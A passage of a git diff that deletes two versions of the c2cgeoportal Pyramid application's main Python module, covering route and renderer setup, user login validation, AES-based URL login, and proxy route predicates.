pyramid_mako import add_mako_renderer -from pyramid.interfaces import IStaticURLInfo -from pyramid.httpexceptions import HTTPException -import pyramid.security - -from papyrus.renderers import GeoJSON, XSD - -import c2cwsgiutils.db -from c2cwsgiutils.health_check import HealthCheck -from sqlalchemy.orm import Session - -import c2cgeoportal_commons.models -from c2cgeoportal_geoportal.lib import dbreflection, caching, \ - C2CPregenerator, MultiDomainStaticURLInfo, checker, check_collector - -log = logging.getLogger(__name__) - -# used by (sql|form)alchemy - -# Header predicate to accept only JSON content -# OL/cgxp are not setting the correct content type for JSON. We have to accept -# XML as well even though JSON is actually send. -JSON_CONTENT_TYPE = "Content-Type:application/(?:json|xml)" - - -class DecimalJSON: - def __init__(self, jsonp_param_name="callback"): - self.jsonp_param_name = jsonp_param_name - - def __call__(self, info): - def _render(value, system): - ret = json.dumps(value, use_decimal=True) - request = system.get("request") - if request is not None: - callback = request.params.get(self.jsonp_param_name) - if callback is None: - request.response.content_type = "application/json" - else: - request.response.content_type = "text/javascript" - ret = "{callback!s}({json!s});".format( - callback=callback, - json=ret - ) - return ret - return _render - - -INTERFACE_TYPE_CGXP = "cgxp" -INTERFACE_TYPE_NGEO = "ngeo" -INTERFACE_TYPE_NGEO_CATALOGUE = "ngeo" - - -def add_interface( - config, interface_name="desktop", interface_type=INTERFACE_TYPE_CGXP, default=False, **kwargs -): # pragma: no cover - if interface_type == INTERFACE_TYPE_CGXP: - add_interface_cgxp( - config, - interface_name=interface_name, - route_names=(interface_name, interface_name + ".js"), - routes=( - "/" if default else "/{0!s}".format(interface_name), - "/{0!s}.js".format(interface_name) - ), - renderers=("/{0!s}.html".format(interface_name), "/{0!s}.js".format(interface_name)), - **kwargs - ) - - elif interface_type == INTERFACE_TYPE_NGEO: - route = "/" if default else "/{0!s}".format(interface_name) - add_interface_ngeo( - config, - interface_name=interface_name, - route_name=interface_name, - route=route, - renderer="/{0!s}.html".format(interface_name), - **kwargs - ) - - -def add_interface_cgxp( - config, interface_name, route_names, routes, renderers, permission=None): # pragma: no cover - # Cannot be at the header to don"t load the model too early - from c2cgeoportal_geoportal.views.entry import Entry - - def add_interface(f): - def new_f(root, request): - request.interface_name = interface_name - return f(root, request) - return new_f - - config.add_route(route_names[0], routes[0]) - config.add_view( - Entry, - decorator=add_interface, - attr="get_cgxp_index_vars", - route_name=route_names[0], - renderer=renderers[0], - permission=permission - ) - # permalink theme: recover the theme for generating custom viewer.js url - config.add_route( - "{0!s}theme".format(route_names[0]), - "{0!s}{1!s}theme/{{themes}}".format(routes[0], "" if routes[0][-1] == "/" else "/"), - ) - config.add_view( - Entry, - decorator=add_interface, - attr="get_cgxp_permalinktheme_vars", - route_name="{0!s}theme".format(route_names[0]), - renderer=renderers[0], - permission=permission - ) - config.add_route( - route_names[1], routes[1], - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_view( - Entry, - decorator=add_interface, - attr="get_cgxp_viewer_vars", - route_name=route_names[1], - renderer=renderers[1], - permission=permission - ) - - -ngeo_static_init = False - - -def add_interface_ngeo( - config, interface_name, route_name, route, renderer, permission=None): # pragma: no cover - # Cannot be at the header to do not load the model too early - from c2cgeoportal_geoportal.views.entry import Entry - - def add_interface(f): - def new_f(root, request): - request.interface_name = interface_name - return f(root, request) - return new_f - - config.add_route(route_name, route, request_method="GET") - config.add_view( - Entry, - decorator=add_interface, - attr="get_ngeo_index_vars", - route_name=route_name, - renderer=renderer, - permission=permission - ) - # permalink theme: recover the theme for generating custom viewer.js url - config.add_route( - "{}theme".format(route_name), - "{}{}theme/{{themes}}".format(route, "" if route[-1] == "/" else "/"), - request_method="GET", - ) - config.add_view( - Entry, - decorator=add_interface, - attr="get_ngeo_permalinktheme_vars", - route_name="{}theme".format(route_name), - renderer=renderer, - permission=permission - ) - - global ngeo_static_init - if not ngeo_static_init: - add_static_view_ngeo(config) - ngeo_static_init = True - - -def add_static_view_ngeo(config): # pragma: no cover - """ Add the project static view for ngeo """ - package = config.get_settings()["package"] - _add_static_view(config, "static-ngeo", "{0!s}_geoportal:static-ngeo".format(package)) - config.override_asset( - to_override="c2cgeoportal_geoportal:project/", - override_with="{0!s}_geoportal:static-ngeo/".format(package) - ) - config.add_static_view( - name=package, - path="{0!s}_geoportal:static".format(package), - cache_max_age=int(config.get_settings()["default_max_age"]) - ) - - mimetypes.add_type("text/css", ".less") - - -def add_admin_interface(config): - if config.get_settings().get("enable_admin_interface", False): - config.add_request_method( - # pylint: disable=not-callable - lambda request: c2cgeoportal_commons.models.DBSession(), 'dbsession', reify=True - ) - config.include('c2cgeoportal_admin', route_prefix='/admin') - - -def add_static_view(config): - """ Add the project static view for CGXP """ - package = config.get_settings()["package"] - _add_static_view(config, "static-cgxp", "{0!s}_geoportal:static".format(package)) - config.override_asset( - to_override="c2cgeoportal_geoportal:project/", - override_with="{0!s}_geoportal:static/".format(package) - ) - - -CACHE_PATH = [] - - -def _add_static_view(config, name, path): - from c2cgeoportal_geoportal.lib.cacheversion import version_cache_buster - config.add_static_view( - name=name, - path=path, - cache_max_age=int(config.get_settings()["default_max_age"]), - ) - config.add_cache_buster(path, version_cache_buster) - CACHE_PATH.append(name) - - -def locale_negotiator(request): - lang = request.params.get("lang") - if lang is None: - lang = request.cookies.get('_LOCALE_') - else: - request.response.set_cookie('_LOCALE_', lang) - if lang is None: - # if best_match returns None then use the default_locale_name configuration variable - return request.accept_language.best_match( - request.registry.settings.get("available_locale_names"), - default_match=request.registry.settings.get("default_locale_name")) - return lang - - -def _match_url_start(reference, value): - """ - Checks that the val URL starts like the ref URL. - """ - reference_parts = reference.rstrip("/").split("/") - value_parts = value[0:len(reference_parts)] - return reference_parts == value_parts - - -def is_valid_referer(request, settings): - if request.referer is not None: - referer = urlsplit(request.referer)._replace(query="", fragment="").geturl().rstrip("/").split("/") - list_ = settings.get("authorized_referers", []) - return any(_match_url_start(e, referer) for e in list_) - else: - return True - - -def create_get_user_from_request(settings): - def get_user_from_request(request, username=None): - """ Return the User object for the request. - - Return ``None`` if: - * user is anonymous - * it does not exist in the database - * the referer is invalid - """ - from c2cgeoportal_commons.models import DBSession - from c2cgeoportal_commons.models.static import User - - try: - if "auth" in request.params: - auth_enc = request.params.get("auth") - - if auth_enc is not None: - urllogin = request.registry.settings.get("urllogin", {}) - aeskey = urllogin.get("aes_key") - if aeskey is None: # pragma: nocover - raise Exception("urllogin is not configured") - now = int(time.time()) - cipher = AES.new(aeskey) - auth = json.loads(cipher.decrypt(binascii.unhexlify(auth_enc))) - - if "t" in auth and "u" in auth and "p" in auth: - timestamp = int(auth["t"]) - if now < timestamp and request.registry.validate_user( - request, auth["u"], auth["p"] - ): - headers = pyramid.security.remember(request, auth["u"]) - request.response.headerlist.extend(headers) - except Exception as e: - log.error("URL login error: %s.", e, exc_info=True) - - if not hasattr(request, "is_valid_referer"): - request.is_valid_referer = is_valid_referer(request, settings) - if not request.is_valid_referer: - log.warning( - "Invalid referer for %s: %s", request.path_qs, repr(request.referer) - ) - return None - - if not hasattr(request, "user_"): - request.user_ = None - if username is None: - username = request.authenticated_userid - if username is not None: - # We know we will need the role object of the - # user so we use joined loading - request.user_ = DBSession.query(User) \ - .filter_by(username=username) \ - .first() - - return request.user_ - return get_user_from_request - - -def set_user_validator(config, user_validator): - """ Call this function to register a user validator function. - - The validator function is passed three arguments: ``request``, - ``username``, and ``password``. The function should return the - user name if the credentials are valid, and ``None`` otherwise. - - The validator should not do the actual authentication operation - by calling ``remember``, this is handled by the ``login`` view. - """ - def register(): - config.registry.validate_user = user_validator - config.action("user_validator", register) - - -def default_user_validator(request, username, password): - """ - Validate the username/password. This is c2cgeoportal's - default user validator. - Return None if we are anonymous, the string to remember otherwise. - """ - del request # unused - from c2cgeoportal_commons.models import DBSession - from c2cgeoportal_commons.models.static import User - user = DBSession.query(User).filter_by(username=username).first() - if user is None: - log.info('Unknow user "{}" tried to log in'.format(username)) - return None - if user.deactivated: - log.info('Deactivated user "{}" tried to log in'.format(username)) - return None - if user.expired(): - log.info('Expired user "{}" tried to log in'.format(username)) - return None - if not user.validate_password(password): - log.info('User "{}" tried to log in with bad credentials'.format(username)) - return None - return username - - -class OgcproxyRoutePredicate: - """ Serve as a custom route predicate function for ogcproxy. - We do not want the OGC proxy to be used to reach the app's - mapserv script. We just return False if the url includes - "mapserv". It is rather drastic, but works for us. """ - - def __init__(self, val, config): - del val # unused - self.private_networks = [ - Network("127.0.0.0/8"), - Network("10.0.0.0/8"), - Network("172.16.0.0/12"), - Network("192.168.0.0/16"), - ] - - def __call__(self, context, request): - url = request.params.get("url") - if url is None: - return False - - parts = urlsplit(url) - try: - ip = IP(gethostbyname(parts.netloc)) - except gaierror as e: - log.info("Unable to get host name for {0!s}: {1!s}".format(url, e)) - return False - for net in self.private_networks: - if ip in net: - return False - return True - - @staticmethod - def phash(): # pragma: no cover - return "" - - -class MapserverproxyRoutePredicate: - """ Serve as a custom route predicate function for mapserverproxy. - If the hide_capabilities setting is set and is true then we want to - return 404s on GetCapabilities requests.""" - - def __init__(self, val, config): - pass - - def __call__(self, context, request): - hide_capabilities = request.registry.settings.get("hide_capabilities") - if not hide_capabilities: - return True - params = dict( - (k.lower(), v.lower()) for k, v in request.params.items() - ) - return "request" not in params or params["request"] != "getcapabilities" - - @staticmethod - def phash(): - return "" - - -def add_cors_route(config, pattern, service): - """ - Add the OPTIONS route and view need for services supporting CORS. - """ - def view(request): # pragma: no cover - from c2cgeoportal_geoportal.lib.caching import set_common_headers, NO_CACHE - return set_common_headers(request, service, NO_CACHE) - - name = pattern + "_options" - config.add_route(name, pattern, request_method="OPTIONS") - config.add_view(view, route_name=name) - - -def error_handler(http_exception, request): # pragma: no cover - """ - View callable for handling all the exceptions that are not already handled. - """ - log.warning("%s returned status code %s", request.url, - http_exception.status_code) - return caching.set_common_headers( - request, "error", caching.NO_CACHE, http_exception, vary=True - ) - - -def call_hook(settings, name, *args, **kwargs): - hooks = settings.get("hooks", {}) - hook = hooks.get(name) - if hook is None: - return - parts = hook.split(".") - module = importlib.import_module(".".join(parts[0:-1])) - function = getattr(module, parts[-1]) - function(*args, **kwargs) - - -def includeme(config): - """ - This function returns a Pyramid WSGI application. - """ - - settings = config.get_settings() - - config.include("c2cgeoportal_commons") - - call_hook(settings, "after_settings", settings) - - get_user_from_request = create_get_user_from_request(settings) - config.add_request_method(get_user_from_request, name="user", property=True) - config.add_request_method(get_user_from_request, name="get_user") - - # Configure 'locale' dir as the translation dir for c2cgeoportal app - config.add_translation_dirs("c2cgeoportal_geoportal:locale/") - - config.include('c2cwsgiutils.pyramid.includeme') - health_check = HealthCheck(config) - - # Initialise DBSessions - init_dbsessions(settings, config, health_check) - - # Initialize the dbreflection module - dbreflection.init() - - checker.init(config, health_check) - check_collector.init(config, health_check) - - # dogpile.cache configuration - if 'cache' in settings: - caching.init_region(settings['cache']) - from c2cgeoportal_commons.models.main import InvalidateCacheEvent - - @zope.event.classhandler.handler(InvalidateCacheEvent) - def handle(event: InvalidateCacheEvent): - del event - caching.invalidate_region() - - # Register a tween to get back the cache buster path. - config.add_tween("c2cgeoportal_geoportal.lib.cacheversion.CachebusterTween") - config.add_tween("c2cgeoportal_geoportal.lib.webpack.WebpackTween") - - # Bind the mako renderer to other file extensions - add_mako_renderer(config, ".html") - add_mako_renderer(config, ".js") - - # Add the "geojson" renderer - config.add_renderer("geojson", GeoJSON()) - - # Add decimal json renderer - config.add_renderer("decimaljson", DecimalJSON()) - - # Add the "xsd" renderer - config.add_renderer("xsd", XSD( - sequence_callback=dbreflection.xsd_sequence_callback - )) - - # Add the set_user_validator directive, and set a default user validator - config.add_directive("set_user_validator", set_user_validator) - config.set_user_validator(default_user_validator) - - # Cannot be at the header to don"t load the model too early - from c2cgeoportal_geoportal.views.entry import Entry - config.add_route('dynamic', '/dynamic.js', request_method="GET") - config.add_view( - Entry, - attr="get_ngeo_index_vars", - route_name='dynamic', - renderer='/dynamic.js' - ) - if settings.get("ogcproxy_enable", False): # pragma: no cover - # Add an OGCProxy view - config.add_route_predicate("ogc_server", OgcproxyRoutePredicate) - config.add_route( - "ogcproxy", "/ogcproxy", - ogc_server=True - ) - config.add_view("papyrus_ogcproxy.views:ogcproxy", route_name="ogcproxy") - - # Add routes to the mapserver proxy - config.add_route_predicate("mapserverproxy", MapserverproxyRoutePredicate) - config.add_route( - "mapserverproxy", "/mapserv_proxy", - mapserverproxy=True, pregenerator=C2CPregenerator(role=True), - ) - - # Add route to the tinyows proxy - config.add_route( - "tinyowsproxy", "/tinyows_proxy", - pregenerator=C2CPregenerator(role=True), - ) - - # Add routes to csv view - config.add_route("csvecho", "/csv", request_method="POST") - - # Add route to the export GPX/KML view - config.add_route("exportgpxkml", "/exportgpxkml") - - # Add routes to the echo service - config.add_route("echo", "/echo", request_method="POST") - - # Add routes to the entry view class - config.add_route("base", "/", static=True) - config.add_route("loginform", "/login.html", request_method="GET") - add_cors_route(config, "/login", "login") - config.add_route("login", "/login", request_method="POST") - add_cors_route(config, "/logout", "login") - config.add_route("logout", "/logout", request_method="GET") - add_cors_route(config, "/loginchange", "login") - config.add_route("loginchange", "/loginchange", request_method="POST") - add_cors_route(config, "/loginresetpassword", "login") - config.add_route("loginresetpassword", "/loginresetpassword", request_method="POST") - add_cors_route(config, "/loginuser", "login") - config.add_route("loginuser", "/loginuser", request_method="GET") - config.add_route("testi18n", "/testi18n.html", request_method="GET") - config.add_route("apijs", "/api.js", request_method="GET") - config.add_route("xapijs", "/xapi.js", request_method="GET") - config.add_route("apihelp", "/apihelp.html", request_method="GET") - config.add_route("xapihelp", "/xapihelp.html", request_method="GET") - config.add_route( - "themes", "/themes", - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_route("invalidate", "/invalidate", request_method="GET") - - # Print proxy routes - config.add_route("printproxy", "/printproxy", request_method="HEAD") - add_cors_route(config, "/printproxy/*all", "print") - config.add_route( - "printproxy_capabilities", "/printproxy/capabilities.json", - request_method="GET", pregenerator=C2CPregenerator(role=True), - ) - config.add_route( - "printproxy_report_create", "/printproxy/report.{format}", - request_method="POST", header=JSON_CONTENT_TYPE - ) - config.add_route( - "printproxy_status", "/printproxy/status/{ref}.json", - request_method="GET" - ) - config.add_route( - "printproxy_cancel", "/printproxy/cancel/{ref}", - request_method="DELETE" - ) - config.add_route( - "printproxy_report_get", "/printproxy/report/{ref}", - request_method="GET" - ) - # For v2 - config.add_route( - "printproxy_info", "/printproxy/info.json", - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_route( - "printproxy_create", "/printproxy/create.json", - request_method="POST", - ) - config.add_route( - "printproxy_get", "/printproxy/{file}.printout", - request_method="GET", - ) - - # Full-text search routes - add_cors_route(config, "/fulltextsearch", "fulltextsearch") - config.add_route("fulltextsearch", "/fulltextsearch") - - # Access to raster data - add_cors_route(config, "/raster", "raster") - config.add_route("raster", "/raster", request_method="GET") - - add_cors_route(config, "/profile.{ext}", "profile") - config.add_route("profile.csv", "/profile.csv", request_method="POST") - config.add_route("profile.json", "/profile.json", request_method="POST") - - # Shortener - add_cors_route(config, "/short/create", "shortener") - config.add_route("shortener_create", "/short/create", request_method="POST") - config.add_route("shortener_get", "/short/{ref}", request_method="GET") - - # Geometry processing - config.add_route("difference", "/difference", request_method="POST") - - # PDF report tool - config.add_route("pdfreport", "/pdfreport/{layername}/{ids}", request_method="GET") - - # Add routes for the "layers" web service - add_cors_route(config, "/layers/*all", "layers") - config.add_route( - "layers_count", "/layers/{layer_id:\\d+}/count", - request_method="GET" - ) - config.add_route( - "layers_metadata", "/layers/{layer_id:\\d+}/md.xsd", - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_route( - "layers_read_many", - "/layers/{layer_id:\\d+,?(\\d+,)*\\d*$}", - request_method="GET") # supports URLs like /layers/1,2,3 - config.add_route( - "layers_read_one", "/layers/{layer_id:\\d+}/{feature_id}", - request_method="GET") - config.add_route( - "layers_create", "/layers/{layer_id:\\d+}", - request_method="POST", header=JSON_CONTENT_TYPE) - config.add_route( - "layers_update", "/layers/{layer_id:\\d+}/{feature_id}", - request_method="PUT", header=JSON_CONTENT_TYPE) - config.add_route( - "layers_delete", "/layers/{layer_id:\\d+}/{feature_id}", - request_method="DELETE") - config.add_route( - "layers_enumerate_attribute_values", - "/layers/{layer_name}/values/{field_name}", - request_method="GET", - pregenerator=C2CPregenerator(), - ) - # There is no view corresponding to that route, it is to be used from - # mako templates to get the root of the "layers" web service - config.add_route("layers_root", "/layers/", request_method="HEAD") - - # Resource proxy (load external url, useful when loading non https content) - config.add_route("resourceproxy", "/resourceproxy", request_method="GET") - - # Scan view decorator for adding routes - config.scan(ignore=["c2cgeoportal_geoportal.scripts", "c2cgeoportal_geoportal.wsgi_app"]) - - if "subdomains" in settings: # pragma: no cover - config.registry.registerUtility( - MultiDomainStaticURLInfo(), IStaticURLInfo) - - # Add the static view (for static resources) - _add_static_view(config, "static", "c2cgeoportal_geoportal:static") - _add_static_view(config, "project", "c2cgeoportal_geoportal:project") - - add_admin_interface(config) - add_static_view(config) - - # Handles the other HTTP errors raised by the views. Without that, - # the client receives a status=200 without content. - config.add_view(error_handler, context=HTTPException) - - -def init_dbsessions(settings: dict, config: Configurator, health_check: HealthCheck=None) -> None: - db_chooser = settings.get('db_chooser', {}) - master_paths = [re.compile(i.replace('//', '/')) for i in db_chooser.get('master', [])] - slave_paths = [re.compile(i.replace('//', '/')) for i in db_chooser.get('slave', [])] - - slave_prefix = 'sqlalchemy_slave' if 'sqlalchemy_slave.url' in settings else None - - c2cgeoportal_commons.models.DBSession, rw_bind, _ = c2cwsgiutils.db.setup_session( - config, 'sqlalchemy', slave_prefix, force_master=master_paths, force_slave=slave_paths) - c2cgeoportal_commons.models.Base.metadata.bind = rw_bind - c2cgeoportal_commons.models.DBSessions['dbsession'] = c2cgeoportal_commons.models.DBSession - - for dbsession_name, dbsession_config in settings.get('dbsessions', {}).items(): # pragma: nocover - c2cgeoportal_commons.models.DBSessions[dbsession_name] = \ - c2cwsgiutils.db.create_session(config, dbsession_name, **dbsession_config) - - c2cgeoportal_commons.models.Base.metadata.clear() - from c2cgeoportal_commons.models import main - - if health_check is not None: - for name, session in c2cgeoportal_commons.models.DBSessions.items(): - if name == 'dbsession': - health_check.add_db_session_check(session, at_least_one_model=main.Theme) - else: # pragma: no cover - def check(session: Session) -> None: - session.execute('SELECT 1') - health_check.add_db_session_check(session, query_cb=check) diff --git a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.target.py b/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.target.py deleted file mode 100644 index 4ed6a0a..0000000 --- a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.target.py +++ /dev/null @@ -1,769 +0,0 @@ -# -*- coding: utf-8 -*- - -# Copyright (c) 2011-2018, Camptocamp SA -# All rights reserved. - -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: - -# 1. Redistributions of source code must retain the above copyright notice, this -# list of conditions and the following disclaimer. -# 2. Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions and the following disclaimer in the documentation -# and/or other materials provided with the distribution. - -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR -# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -# The views and conclusions contained in the software and documentation are those -# of the authors and should not be interpreted as representing official policies, -# either expressed or implied, of the FreeBSD Project. - -import time -import logging -import mimetypes -import binascii -from urllib.parse import urlsplit - -import c2cwsgiutils -import re -import simplejson as json -from socket import gethostbyname, gaierror -from ipcalc import IP, Network -from Crypto.Cipher import AES -import importlib - -import zope.event.classhandler -from pyramid.config import Configurator -from pyramid_mako import add_mako_renderer -from pyramid.interfaces import IStaticURLInfo -from pyramid.httpexceptions import HTTPException -import pyramid.security - -from papyrus.renderers import GeoJSON, XSD - -import c2cwsgiutils.db -from c2cwsgiutils.health_check import HealthCheck -from sqlalchemy.orm import Session - -import c2cgeoportal_commons.models -from c2cgeoportal_geoportal.lib import dbreflection, caching, \ - C2CPregenerator, MultiDomainStaticURLInfo, checker, check_collector - -log = logging.getLogger(__name__) - -# used by (sql|form)alchemy - -# Header predicate to accept only JSON content -# OL/cgxp are not setting the correct content type for JSON. We have to accept -# XML as well even though JSON is actually send. -JSON_CONTENT_TYPE = "Content-Type:application/(?:json|xml)" - - -class DecimalJSON: - def __init__(self, jsonp_param_name="callback"): - self.jsonp_param_name = jsonp_param_name - - def __call__(self, info): - def _render(value, system): - ret = json.dumps(value, use_decimal=True) - request = system.get("request") - if request is not None: - callback = request.params.get(self.jsonp_param_name) - if callback is None: - request.response.content_type = "application/json" - else: - request.response.content_type = "text/javascript" - ret = "{callback!s}({json!s});".format( - callback=callback, - json=ret - ) - return ret - return _render - - -INTERFACE_TYPE_CGXP = "cgxp" -INTERFACE_TYPE_NGEO = "ngeo" -INTERFACE_TYPE_NGEO_CATALOGUE = "ngeo" - - -def add_interface( - config, interface_name="desktop", interface_type=INTERFACE_TYPE_CGXP, default=False, **kwargs -): # pragma: no cover - if interface_type == INTERFACE_TYPE_CGXP: - add_interface_cgxp( - config, - interface_name=interface_name, - route_names=(interface_name, interface_name + ".js"), - routes=( - "/" if default else "/{0!s}".format(interface_name), - "/{0!s}.js".format(interface_name) - ), - renderers=("/{0!s}.html".format(interface_name), "/{0!s}.js".format(interface_name)), - **kwargs - ) - - elif interface_type == INTERFACE_TYPE_NGEO: - route = "/" if default else "/{0!s}".format(interface_name) - add_interface_ngeo( - config, - interface_name=interface_name, - route_name=interface_name, - route=route, - renderer="/{0!s}.html".format(interface_name), - **kwargs - ) - - -def add_interface_cgxp( - config, interface_name, route_names, routes, renderers, permission=None): # pragma: no cover - # Cannot be at the header to don"t load the model too early - from c2cgeoportal_geoportal.views.entry import Entry - - def add_interface(f): - def new_f(root, request): - request.interface_name = interface_name - return f(root, request) - return new_f - - config.add_route(route_names[0], routes[0]) - config.add_view( - Entry, - decorator=add_interface, - attr="get_cgxp_index_vars", - route_name=route_names[0], - renderer=renderers[0], - permission=permission - ) - # permalink theme: recover the theme for generating custom viewer.js url - config.add_route( - "{0!s}theme".format(route_names[0]), - "{0!s}{1!s}theme/{{themes}}".format(routes[0], "" if routes[0][-1] == "/" else "/"), - ) - config.add_view( - Entry, - decorator=add_interface, - attr="get_cgxp_permalinktheme_vars", - route_name="{0!s}theme".format(route_names[0]), - renderer=renderers[0], - permission=permission - ) - config.add_route( - route_names[1], routes[1], - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_view( - Entry, - decorator=add_interface, - attr="get_cgxp_viewer_vars", - route_name=route_names[1], - renderer=renderers[1], - permission=permission - ) - - -ngeo_static_init = False - - -def add_interface_ngeo( - config, interface_name, route_name, route, renderer, permission=None): # pragma: no cover - # Cannot be at the header to do not load the model too early - from c2cgeoportal_geoportal.views.entry import Entry - - def add_interface(f): - def new_f(root, request): - request.interface_name = interface_name - return f(root, request) - return new_f - - config.add_route(route_name, route, request_method="GET") - config.add_view( - Entry, - decorator=add_interface, - attr="get_ngeo_index_vars", - route_name=route_name, - renderer=renderer, - permission=permission - ) - # permalink theme: recover the theme for generating custom viewer.js url - config.add_route( - "{}theme".format(route_name), - "{}{}theme/{{themes}}".format(route, "" if route[-1] == "/" else "/"), - request_method="GET", - ) - config.add_view( - Entry, - decorator=add_interface, - attr="get_ngeo_permalinktheme_vars", - route_name="{}theme".format(route_name), - renderer=renderer, - permission=permission - ) - - global ngeo_static_init - if not ngeo_static_init: - add_static_view_ngeo(config) - ngeo_static_init = True - - -def add_static_view_ngeo(config): # pragma: no cover - """ Add the project static view for ngeo """ - package = config.get_settings()["package"] - _add_static_view(config, "static-ngeo", "{0!s}_geoportal:static-ngeo".format(package)) - config.override_asset( - to_override="c2cgeoportal_geoportal:project/", - override_with="{0!s}_geoportal:static-ngeo/".format(package) - ) - config.add_static_view( - name=package, - path="{0!s}_geoportal:static".format(package), - cache_max_age=int(config.get_settings()["default_max_age"]) - ) - - mimetypes.add_type("text/css", ".less") - - -def add_admin_interface(config): - if config.get_settings().get("enable_admin_interface", False): - config.add_request_method( - # pylint: disable=not-callable - lambda request: c2cgeoportal_commons.models.DBSession(), 'dbsession', reify=True - ) - config.include('c2cgeoportal_admin', route_prefix='/admin') - - -def add_static_view(config): - """ Add the project static view for CGXP """ - package = config.get_settings()["package"] - _add_static_view(config, "static-cgxp", "{0!s}_geoportal:static".format(package)) - config.override_asset( - to_override="c2cgeoportal_geoportal:project/", - override_with="{0!s}_geoportal:static/".format(package) - ) - - -CACHE_PATH = [] - - -def _add_static_view(config, name, path): - from c2cgeoportal_geoportal.lib.cacheversion import version_cache_buster - config.add_static_view( - name=name, - path=path, - cache_max_age=int(config.get_settings()["default_max_age"]), - ) - config.add_cache_buster(path, version_cache_buster) - CACHE_PATH.append(name) - - -def locale_negotiator(request): - lang = request.params.get("lang") - if lang is None: - lang = request.cookies.get('_LOCALE_') - else: - request.response.set_cookie('_LOCALE_', lang) - if lang is None: - # if best_match returns None then use the default_locale_name configuration variable - return request.accept_language.best_match( - request.registry.settings.get("available_locale_names"), - default_match=request.registry.settings.get("default_locale_name")) - return lang - - -def _match_url_start(reference, value): - """ - Checks that the val URL starts like the ref URL. - """ - reference_parts = reference.rstrip("/").split("/") - value_parts = value[0:len(reference_parts)] - return reference_parts == value_parts - - -def is_valid_referer(request, settings): - if request.referer is not None: - referer = urlsplit(request.referer)._replace(query="", fragment="").geturl().rstrip("/").split("/") - list_ = settings.get("authorized_referers", []) - return any(_match_url_start(e, referer) for e in list_) - else: - return True - - -def create_get_user_from_request(settings): - def get_user_from_request(request, username=None): - """ Return the User object for the request. - - Return ``None`` if: - * user is anonymous - * it does not exist in the database - * the referer is invalid - """ - from c2cgeoportal_commons.models import DBSession - from c2cgeoportal_commons.models.static import User - - try: - if "auth" in request.params: - auth_enc = request.params.get("auth") - - if auth_enc is not None: - urllogin = request.registry.settings.get("urllogin", {}) - aeskey = urllogin.get("aes_key") - if aeskey is None: # pragma: nocover - raise Exception("urllogin is not configured") - now = int(time.time()) - data = binascii.unhexlify(auth_enc.encode('ascii')) - nonce = data[0:16] - tag = data[16:32] - ciphertext = data[32:] - cipher = AES.new(aeskey.encode("ascii"), AES.MODE_EAX, nonce) - auth = json.loads(cipher.decrypt_and_verify(ciphertext, tag).decode("utf-8")) - - if "t" in auth and "u" in auth and "p" in auth: - timestamp = int(auth["t"]) - if now < timestamp and request.registry.validate_user( - request, auth["u"], auth["p"] - ): - headers = pyramid.security.remember(request, auth["u"]) - request.response.headerlist.extend(headers) - except Exception as e: - log.error("URL login error: %s.", e, exc_info=True) - - if not hasattr(request, "is_valid_referer"): - request.is_valid_referer = is_valid_referer(request, settings) - if not request.is_valid_referer: - log.warning( - "Invalid referer for %s: %s", request.path_qs, repr(request.referer) - ) - return None - - if not hasattr(request, "user_"): - request.user_ = None - if username is None: - username = request.authenticated_userid - if username is not None: - # We know we will need the role object of the - # user so we use joined loading - request.user_ = DBSession.query(User) \ - .filter_by(username=username) \ - .first() - - return request.user_ - return get_user_from_request - - -def set_user_validator(config, user_validator): - """ Call this function to register a user validator function. - - The validator function is passed three arguments: ``request``, - ``username``, and ``password``. The function should return the - user name if the credentials are valid, and ``None`` otherwise. - - The validator should not do the actual authentication operation - by calling ``remember``, this is handled by the ``login`` view. - """ - def register(): - config.registry.validate_user = user_validator - config.action("user_validator", register) - - -def default_user_validator(request, username, password): - """ - Validate the username/password. This is c2cgeoportal's - default user validator. - Return None if we are anonymous, the string to remember otherwise. - """ - del request # unused - from c2cgeoportal_commons.models import DBSession - from c2cgeoportal_commons.models.static import User - user = DBSession.query(User).filter_by(username=username).first() - if user is None: - log.info('Unknow user "{}" tried to log in'.format(username)) - return None - if user.deactivated: - log.info('Deactivated user "{}" tried to log in'.format(username)) - return None - if user.expired(): - log.info('Expired user "{}" tried to log in'.format(username)) - return None - if not user.validate_password(password): - log.info('User "{}" tried to log in with bad credentials'.format(username)) - return None - return username - - -class OgcproxyRoutePredicate: - """ Serve as a custom route predicate function for ogcproxy. - We do not want the OGC proxy to be used to reach the app's - mapserv script. We just return False if the url includes - "mapserv". It is rather drastic, but works for us. """ - - def __init__(self, val, config): - del val # unused - self.private_networks = [ - Network("127.0.0.0/8"), - Network("10.0.0.0/8"), - Network("172.16.0.0/12"), - Network("192.168.0.0/16"), - ] - - def __call__(self, context, request): - url = request.params.get("url") - if url is None: - return False - - parts = urlsplit(url) - try: - ip = IP(gethostbyname(parts.netloc)) - except gaierror as e: - log.info("Unable to get host name for {0!s}: {1!s}".format(url, e)) - return False - for 